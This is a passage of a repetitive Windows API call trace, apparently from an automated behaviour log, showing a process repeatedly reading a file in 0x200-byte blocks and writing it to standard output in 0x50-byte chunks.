lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.384] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.384] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] GetFileType (hFile=0x50) returned 0x1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] GetFileType (hFile=0x50) returned 0x1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] GetFileType (hFile=0x50) returned 0x1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] GetFileType (hFile=0x50) returned 0x1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.385] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.385] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.386] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.386] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] GetFileType (hFile=0x50) returned 0x1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] GetFileType (hFile=0x50) returned 0x1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] GetFileType (hFile=0x50) returned 0x1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] GetFileType (hFile=0x50) returned 0x1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.387] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.387] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] GetFileType (hFile=0x50) returned 0x1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] GetFileType (hFile=0x50) returned 0x1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] GetFileType (hFile=0x50) returned 0x1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] GetFileType (hFile=0x50) returned 0x1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] GetFileType (hFile=0x50) returned 0x1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.388] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.388] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.390] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.390] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.390] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.391] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.391] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.391] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.392] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.392] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.392] GetFileType (hFile=0x50) returned 0x1 [0145.392] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType (hFile=0x50) returned 0x1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType (hFile=0x50) returned 0x1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType (hFile=0x50) returned 0x1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType (hFile=0x50) returned 0x1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.393] GetFileType (hFile=0x50) returned 0x1 [0145.393] 